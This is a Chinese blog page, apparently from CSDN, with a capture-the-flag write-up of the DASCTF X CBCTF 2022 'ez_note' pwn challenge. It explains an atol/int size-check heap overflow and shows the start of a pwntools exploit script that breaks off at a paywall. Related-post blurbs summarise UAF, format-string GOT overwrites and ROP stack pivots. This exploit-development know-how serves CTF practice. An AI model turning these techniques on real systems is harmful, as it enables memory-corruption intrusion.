DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现

最新推荐文章于 2024-09-06 16:15:01 发布
原创 最新推荐文章于 2024-09-06 16:15:01 发布 · 2k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细复盘了DASCTFXCBCTF2022九月挑战赛中的pwn题目,包括利用堆溢出、双自由缺陷(uaf)及格式字符串漏洞等技术手段,通过精心构造payload实现内存泄漏、劫持函数指针等操作以获取shell。

DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现

**

ez_note

**
请添加图片描述
漏洞点:注意这里·是atol不是atoi所以输入的是64位的数据
但是检测输入size的时候是用按int类型检查,可以造成堆溢出。请添加图片描述
找到漏洞点了就可以利用了,重点在堆利用这块。
先看看exp:

from pwn import *
context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
p = process('./pwn')
#elf=ELF('./pwn')

#io = remote('59.110.24.117',33320)
libc = ELF('/home/pwn/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc-2.31.so')
rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
def dbg():
    gdb.attach(p)
    pause()

def add(size,content):
    sa('Your choice:',str(1))
    sa('Note size:',str(size))
    sa('Note content:',content)

def delete(index):
    sa('Your choice:',str(2))
    sa('Note ID:',str(index))

def show(index):
    sa('Your choice:',str(3))
    sa('Note ID:',str(index))
    ru('Note content:')

# add(0x108,'a'*0x108)
add(0x80,'a')
add(<
最低0.47元/天 解锁文章
DASCTF X CBCTF 2022九月挑战赛
shinygod的博客
10-19 875
找给 check.php 发包的那个部分。可以在开发者工具里全局搜索一下,发现是 sn 这个函数发的包,代码有点乱可以。在 sn 函数中看到了三个参数的设置。先看一下是在哪边调用的 sn ,然后一个一个的跟踪就行了。搜索 checkCode ,checkCode 由一串字符串和 salt 构成,而 tm 是时间戳,score 是分数,最后就可以构造 exp了。
DASCTF X CBCTF 2022九月挑战赛 reverse landing
weixin_63051469的博客
09-22 777
胡小楠的刷题日常
DASCTF X CBCTF 2022九月挑战赛 Text Reverser
qq_64201116的博客
09-18 700
那就用脚本或者在线工具讲构造好的payload反序一下。被过滤了就用{%print%}的形式。Fuzz一波,看一下过滤情况。
DASCTF X CBCTF 2022九月挑战赛-Pwn
qq_34010404的博客
09-19 771
buf 后面跟着一个libc的地址,可以leak libc 的基址下面跟着一个格式串漏洞,puts里面调用的strlen,改那个got为one_gadget 即可(这个题刚好有一个满足的gadget)栈溢出,但是只能覆盖返回地址,栈迁移做就行UAF 可以改fd (加或减去一个偏移)
DASCTF X CBCTF 2022九月挑战赛WEB复盘
m0_61206225的博客
09-21 596
dino3d Text Reverser cbshop JavaMaster
DASCTF X CBCTF 2022九月挑战赛 cyberprinter wp
qq_65147345的博客
10-02 589
通过格式化字符串漏洞改写libc中strlen的got表地址为one_gadget
DASCTF X CBCTF 2022九月挑战赛 ez_note wp
qq_65147345的博客
10-03 300
1. atol与atoi导致的漏洞问题 2. overlap
DASCTF X CBCTF 2022九月挑战赛 appetizer
qq_65147345的博客
10-04 444
1. 将rop链布置到end中,泄露出libc地址,通过最后一个read进行栈迁移 2. 在第一个链中输出完之后再执行一个read向end写入第二个rop链 3. 第二个rop链就是常规的open,read,puts了
DASCTF 2022 9月挑战赛 cyberprinter
zyxx_wjc的博客
09-27 438
DASCTF 2022 9月挑战赛 cyberprinter
DASCTF X CBCTF 2022九月挑战赛 学习记录
m0_64815693的博客
09-23 2108
学习记录
DASCTF X CBCTF 2022九月挑战赛 WriteUp
Whitebird的博客
10-24 913
DASCTF X CBCTF 2022九月挑战赛 WriteUp
DASCTF X CBCTF 2022九月挑战赛 Writeup
末初 · mochu7
09-20 1919
DASCTF X CBCTF 2022九月挑战赛 Writeup
pwnDASCTF Sept 九月
woodwhale的博客
09-26 3830
pwnDASCTF Sept 月赛 1、hehepwn 先查看保护,栈可执行,想到shellcode 这题需要注意shellcode的写法 拖入ida中分析 一直以为iso scanf不能栈溢出,后来发现我是shabi 先进入sub_4007F9()函数 有个read函数,恰好读完s数组,由于printf是碰到\x00截断,所以如果我们输满0x20个padding就可以读取一个栈地址 我们可以把shellcode写入scanf输入的地址中,通过创建fake rbp进行栈迁移,而这个栈中存有我们写入
DASCTF X CBCTF 2022九月挑战赛 bar wp
qq_65147345的博客
10-03 317
思路: 1. 通过漏洞改写fd打tcache attack
DASCTF9月赛pwn-wp
Stella_Leo的博客
09-28 1714
DASCTF-2021-9月 头一次打安恒月赛,体验还不错,没有足够的时间,稍微看了下pwn,两个栈是我没想到的,然后还有一个heap题目,然而还需要先绕过re认证才能正常的pwn也是我没想到的。。 文章不贴图片了,较简单 hehepwn 啥保护没开 这是最简单的,就一个scanf明显的溢出,然后strdup函数那里,可以写满s把\x00打没了,然后泄露rbp,然后就是ret2shellcode exp #coding:utf-8 from pwn import * context.log_level='d
DASCTF X GFCTF 2022十月挑战赛 - pwn
z1r0的博客
10-28 1020
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall。这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了。发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh。这里的地方,并且最后还可以控制ret。
羊城杯比赛pwn复现
最新发布
yufeiyu66的博客
09-06 698
pwn 比赛复现
2018年强网杯pwn复现
qq_46441427的博客
08-31 313
silent 漏洞位置: free后没有给指针置空,edit也没有检查chunk是否free 利用思路: 利用uaf把chunk进入fastbin中,构造三个单链表来写free_hook然后getshell
鹏城杯2018网络安全挑战赛pwn题目解析
资源摘要信息:"鹏城杯-2018-note" ...综上所述,这些文件很可能在鹏城杯-2018比赛的Pwn相关挑战中发挥了重要作用,其中 `pwn.i64` 和 `pwn` 文件可能含有漏洞二进制程序,而 `exp.py` 是用于利用这些漏洞的Python脚本。
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值